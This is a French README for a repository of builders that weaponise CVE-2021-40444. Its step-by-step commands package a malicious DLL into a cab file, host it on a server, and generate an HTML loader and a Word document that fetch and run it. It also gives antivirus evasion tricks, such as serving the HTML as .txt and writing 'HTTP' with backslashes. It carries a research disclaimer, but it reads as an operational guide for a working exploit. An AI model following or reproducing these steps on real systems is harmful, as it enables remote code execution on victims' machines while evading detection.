
Ce dépôt contient des générateurs de fichiers cab, html et docx pour l'exploit CVE-2021-40444.
Ce dépôt contient des builders de fichiers cab, html et docx pour l'exploit CVE-2021-40444. Ce dépôt est uniquement destiné à des fins de test, de recherche et d'éducation. Vous êtes responsable de l'utilisation que vous faites du code fourni dans ce dépôt.
Le code est développé en rétro-ingénierie d'échantillons de malwares trouvés dans la nature et partagés par divers chercheurs en sécurité.
Les builders pour cette CVE sont déjà publics. Le but de ce dépôt est de vérifier avec quelle efficacité nous pouvons contourner les détections statiques de différents éditeurs d'antivirus pour les fichiers docx, au moment où nous écrivons ces lignes.
Le code JS peut être facilement obfusqué par des outils en ligne ou manuellement. Mais le fichier docx ne contient qu'un seul fichier, document.xml.rels, sur lequel les signatures peuvent être basées. Que pouvons-nous modifier dedans pour échapper aux détections statiques de la plupart des AV.
Le cabrc.exe est un exe Microsoft inclus dans Internet Explorer Administration Kit et peut être téléchargé depuis https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads et après l'installation, vous trouverez cet exe dans "C:\Program Files (x86)\Windows IEAK 11"
Il y a 3 builders.
Le code fonctionne avec python 2.7
Commencez par aller dans le dossier CVE-2021-40444, placez votre fichier dll et renommez-le en IEcache.inf (ou vous pouvez utiliser la dll calc déjà présente).
Ensuite, allez dans le dossier source et générez le fichier cab
c:\cve-2021-40444\sources\python generate_cab.py
Téléversez votre fichier cab, puis, en utilisant l'URL du fichier cab, générez le fichier html
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Remarque : au lieu d'utiliser l'extension html, si nous utilisons .txt, l'exploit fonctionne toujours, mais contourne l'AV)
Enfin, téléversez votre fichier html et générez le fichier doc. Utilisez HTTP (en majuscules) au lieu de http, et "" au lieu de "/", pour contourner l'AV. Et nous n'avons pas non plus besoin de x-usc:.
exemple : c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
Le résultat est devant vous.


www.aslitsecurity.com
[email protected]